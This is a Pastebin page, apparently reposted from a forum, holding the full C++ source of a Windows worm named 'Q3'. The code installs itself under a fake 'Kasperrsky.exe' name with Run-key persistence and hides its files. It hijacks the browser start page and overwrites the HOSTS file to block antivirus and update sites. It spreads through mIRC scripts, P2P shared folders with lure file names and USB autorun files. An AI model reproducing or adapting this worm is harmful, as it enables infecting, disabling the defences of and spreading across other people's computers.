API tools faq
paste
FlyFar

Q3 Worm in C++ - Source Code - Rohitab - Forums

FlyFar
Jul 4th, 2023
133
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 8.50 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2.  
  3.  
  4.  
  5.           Hi Gys this is my second <span class="searchlite">worm</span>
  6.  
  7.           This <span class="searchlite">worm</span> will spread via mirc,
  8.  
  9.           p2p software,and removable drive (USB)
  10.  
  11.           Create auto run file on usb drive,
  12.  
  13.           every time if you click on usb
  14.  
  15.           <span class="searchlite">worm</span> will run
  16.  
  17.           disable security site,create new start page,
  18.  
  19.           infect mirc to spread this <span class="searchlite">worm</span>,
  20.  
  21.           Copy to p2p software,hide in system ditectory.
  22.  
  23.           if you wont compile this code with borland not DevCpp
  24.  
  25.          
  26.  
  27.                                                          */
  28.  
  29.  
  30.  
  31. #include<windows.h>
  32.  
  33. #include<functions.h>
  34.  
  35. #include<fstream>
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45. void Inst<span class="searchlite">Worm</span>();
  46.  
  47. void HomePage();
  48.  
  49. void hst(void);
  50.  
  51. void mircSpread();
  52.  
  53. void p2pCpyWrm();
  54.  
  55. int FindDrv(const char *drive);
  56.  
  57. void Hide();
  58.  
  59. void Q3main();
  60.  
  61.  
  62.  
  63. const char *drive[]={
  64.  
  65.                        "a:", "b:", "c:", "d:", "e:", "f:", "g:", "h:", "i:", "j:", "k:", "l:",
  66.  
  67.                        "m:", "n:", "o:", "p:", "q:", "r:", "s:", "t:", "u:", "v:", "w:", "x:",
  68.  
  69.                        "y:", "z:", 0
  70.  
  71.                     };
  72.  
  73.  
  74.  
  75. const char Msg[]="Norton Is Fucking Shit";
  76.  
  77.  
  78.  
  79. void Inst<span class="searchlite">Worm</span>()
  80.  
  81. {
  82.  
  83. HKEY     hKey;
  84.  
  85. char     sd[MAX_PATH];
  86.  
  87. char     path[MAX_PATH];
  88.  
  89. HMODULE GetH;
  90.  
  91. GetH=GetModuleHandle(0);
  92.  
  93. GetModuleFileName(GetH,path,sizeof(path));
  94.  
  95. GetSystemDirectory(sd,sizeof(sd));
  96.  
  97. strcat(sd,"\\Kasperrsky.exe");
  98.  
  99. CopyFile(path,sd,FALSE);
  100.  
  101.  
  102.  
  103. RegOpenKeyEx(HKEY_LOCAL_MACHINE,
  104.  
  105.             "Software\134\134Microsoft\134\134Windows\134\134CurrentVersion\134\134Run",
  106.  
  107.               0,KEY_SET_VALUE,&hKey);
  108.  
  109. RegSetValueEx(hKey,"Q3",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
  110.  
  111. RegOpenKeyEx(HKEY_CURRENT_USER,
  112.  
  113.             "Software\\Microsoft\\Security Center",
  114.  
  115.              0,KEY_SET_VALUE,&hKey);
  116.  
  117. RegSetValueEx(hKey,"FirstRun",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
  118.  
  119. RegCloseKey(hKey);
  120.  
  121. SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);
  122.  
  123. }
  124.  
  125. void HomePage()
  126.  
  127. {
  128.  
  129. HKEY  sKey;
  130.  
  131. unsigned char regi[50]="www.sex.com";
  132.  
  133.  
  134.  
  135.   RegCreateKey(HKEY_CURRENT_USER,
  136.  
  137.               "Software\\Microsoft\134\134Internet Explorer\134\134Main",&sKey);
  138.  
  139.   RegSetValueEx(sKey,"Start Page", 0, REG_SZ, regi, sizeof(regi));
  140.  
  141.   RegCloseKey(sKey);
  142.  
  143. }
  144.  
  145. void hst(void)
  146.  
  147. {
  148.  
  149. char hst[MAX_PATH];
  150.  
  151. DWORD byte;
  152.  
  153. HANDLE hFile;
  154.  
  155. BOOL bSuccess;
  156.  
  157. GetSystemDirectory(hst, sizeof(hst));
  158.  
  159.  
  160.  
  161. strcat(hst, "\\Drivers\\ETC\\HOSTS");
  162.  
  163. const char* buffer = "127.0.0.1 www.mirc.com 127.0.0.1 mirc.com 127.0.0.1 norton.com 127.0.0.1 www.norton.com 127.0.0.1 yahoo.com 127.0.0.1 www.yahoo.com 127.0.0.1 microsoft.com 127.0.0.1 www.microsoft.com 127.0.0.1 windowsupdate.com 127.0.0.1 www.windowsupdate.com 127.0.0.1 www.mcafee.com 127.0.0.1 mcafee.com 127.0.0.1 www.nai.com 127.0.0.1 nai.com 127.0.0.1 www.ca.com 127.0.0.1 ca.com 127.0.0.1 liveupdate.symantec.com 127.0.0.1 www.sophos.com 127.0.0.1 www.google.com 127.0.0.1 google.com";
  164.  
  165. hFile = CreateFile(hst, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
  166.  
  167. bSuccess = WriteFile ( hFile, buffer, strlen(buffer), &byte, NULL);
  168.  
  169. CloseHandle(hFile);      
  170.  
  171. }
  172.  
  173. void mircSpread()
  174.  
  175. {
  176.  
  177.   char InfectMircIni[]="..\\Application Data\\mIRC\\mirc.ini";
  178.  
  179.   char <span class="searchlite">Worm</span>Script[]="..\\Application Data\\mIRC\\scripts\\Q3Bot.zip";
  180.  
  181.   char InfectMircIni1[]="\\Program Files\\mIRC\\defaults\\mirc.ini";
  182.  
  183.   char <span class="searchlite">Worm</span>Script1[]="\\Program Files\\mIRC\\defaults\\scripts\\Q3Bot.zip";
  184.  
  185.   ofstream WrmScr;
  186.  
  187.   fstream  IniInfe;
  188.  
  189.      
  190.  
  191.     IniInfe.open(InfectMircIni);
  192.  
  193.             IniInfe<<"[rfiles]"<<endl;
  194.  
  195.             IniInfe<<"n0=scripts\\users.ini"<<endl;
  196.  
  197.             IniInfe<<"n1=scripts\\vars.ini"<<endl;
  198.  
  199.             IniInfe<<"n2=scripts\\Q3Bot.zip"<<endl;
  200.  
  201.     IniInfe.close();
  202.  
  203.     WrmScr.open(<span class="searchlite">Worm</span>Script,ios_base::out);
  204.  
  205.              WrmScr<<"[script]"<<endl;
  206.  
  207.              WrmScr<<"n0=on 1:join:#:{"<<endl;
  208.  
  209.              WrmScr<<"n1= /if ($nick == $me ){halt}"<<endl;
  210.  
  211.              WrmScr<<"n2= /dcc send $nick C:\\Program Files\A1\\MySexPics.zip.exe"<<endl;
  212.  
  213.              WrmScr<<"n3=}"<<endl;
  214.  
  215.     WrmScr.close();
  216.  
  217.  
  218.  
  219.     IniInfe.open(InfectMircIni1);
  220.  
  221.             IniInfe<<"[rfiles]"<<endl;
  222.  
  223.             IniInfe<<"n0=scripts\\users.ini"<<endl;
  224.  
  225.             IniInfe<<"n1=scripts\\vars.ini"<<endl;
  226.  
  227.             IniInfe<<"n2=scripts\\Q3Bot.zip"<<endl;
  228.  
  229.     IniInfe.close();
  230.  
  231.     WrmScr.open(<span class="searchlite">Worm</span>Script1,ios_base::out);
  232.  
  233.             WrmScr<<"[script]"<<endl;
  234.  
  235.             WrmScr<<"n0=on 1:join:#:{"<<endl;
  236.  
  237.             WrmScr<<"n1= /if ($nick == $me ){halt}"<<endl;
  238.  
  239.             WrmScr<<"n2= /dcc send $nick C:\\Program Files\\A1\\MySexPics.zip.exe"<<endl;
  240.  
  241.             WrmScr<<"n3=}"<<endl;
  242.  
  243.     WrmScr.close();      
  244.  
  245. }
  246.  
  247. void p2pCpyWrm()
  248.  
  249. {
  250.  
  251.   char  pathE[0x1600];      
  252.  
  253.   HMODULE   pathI=GetModuleHandle(NULL);
  254.  
  255.   GetModuleFileName(pathI,pathE,0x1600);
  256.  
  257.  
  258.  
  259.     CreateDirectory("\\Kasperrsky Anti Virus",NULL);
  260.  
  261.       CreateDirectory("\\Program Files\\A1",NULL);
  262.  
  263.     char *Cpy<span class="searchlite">Worm</span>[]={
  264.  
  265.                       "\\Program Files\\A1\\MySexPics.zip.exe",
  266.  
  267.                       "\\Documents and Settings\\All Users\\Desktop\\MyPornPics.zip.exe",
  268.  
  269.                       "\\Program Files\\eMule\\Incoming\\PornLoader.exe",
  270.  
  271.                       "\\Program Files\\edonkey2000\\incoming\\WinRaR.exe",
  272.  
  273.                       "\\Program files\\ICQ\\Shared Folder\\SexyTime.exe",
  274.  
  275.                       "\\Program Files\\Morpheus\\My Shared Folder\\Sex.exe",
  276.  
  277.                       "\\Kasperrsky Anti Virus\\Kasperrsky.exe",
  278.  
  279.                     };
  280.  
  281.                           for(int ix=0; ix < sizeof(char)+6; ix++)
  282.  
  283.                               {
  284.  
  285.                                 CopyFile(pathE,ix[Cpy<span class="searchlite">Worm</span>],NULL);
  286.  
  287.                               }            
  288.  
  289. }
  290.  
  291. int FindDrv(const char *drive)
  292.  
  293. {
  294.  
  295.  char dirX[MAX_PATH];
  296.  
  297.  char path[MAX_PATH];
  298.  
  299.  char autorun[MAX_PATH]="AutoRun.inf";
  300.  
  301.  ofstream CreAut;
  302.  
  303.  HMODULE GetQ;
  304.  
  305.  
  306.  
  307.    GetQ=GetModuleHandle(NULL);
  308.  
  309.     GetModuleFileName(GetQ,path,sizeof(path));
  310.  
  311.       CreAut.open(dirX,ios_base::out);
  312.  
  313.              CreAut<<"[AutoRun]"<<endl;
  314.  
  315.              CreAut<<"open=Kasperrsky.exe"<<endl;
  316.  
  317.              CreAut<<"shellexecute=Kasperrsky.exe"<<endl;
  318.  
  319.              CreAut<<"shell\\Auto\\command=Kasperrsky.exe"<<endl;
  320.  
  321.              CreAut<<"shell=Auto"<<endl;
  322.  
  323.       CreAut.close();
  324.  
  325.       SetFileAttributes(dirX,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);
  326.  
  327.              UINT type= GetDriveType(drive);
  328.  
  329.                   if(type == DRIVE_REMOVABLE)
  330.  
  331.                      {
  332.  
  333.                        strcpy(dirX, drive);
  334.  
  335.                        strcat(dirX, "\\");
  336.  
  337.                        strcat(dirX, "Kasperrsky.exe");
  338.  
  339.                        CopyFile(path,dirX,TRUE);
  340.  
  341.                        strcpy(dirX, drive);
  342.  
  343.                        strcat(dirX, "\\" );
  344.  
  345.                        strcat(dirX, autorun);
  346.  
  347.                        return 0;
  348.  
  349.                      }
  350.  
  351.   return 0;
  352.  
  353. }
  354.  
  355. void Hide()
  356.  
  357. {
  358.  
  359.   char <span class="searchlite">Worm</span>Script1[]="\\Program Files\\mIRC\\defaults\\scripts\\Q3Bot.zip";
  360.  
  361.   char <span class="searchlite">Worm</span>Script[]="..\\Application Data\\mIRC\\scripts\\Q3Bot.zip";
  362.  
  363.  
  364.  
  365.        SetFileAttributes(<span class="searchlite">Worm</span>Script1,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);
  366.  
  367.          SetFileAttributes(<span class="searchlite">Worm</span>Script,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);
  368.  
  369. }
  370.  
  371. void Q3main()
  372.  
  373. {
  374.  
  375.    Inst<span class="searchlite">Worm</span>();
  376.  
  377.     HomePage();
  378.  
  379.       hst();
  380.  
  381.         mircSpread();
  382.  
  383.           p2pCpyWrm();    
  384.  
  385.           for(int ix =0 ; drive[ix]; ix++)
  386.  
  387.              {
  388.  
  389.                FindDrv(drive[ix]);
  390.  
  391.              }  
  392.  
  393.                Hide();
  394.  
  395. }    
  396.  
  397. int main()
  398.  
  399. {
  400.  
  401.  
  402.  
  403.  
  404.  
  405.     Q3main();
  406.  
  407.  
  408.  
  409. }
Tags: C++ cpp mirc worm
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!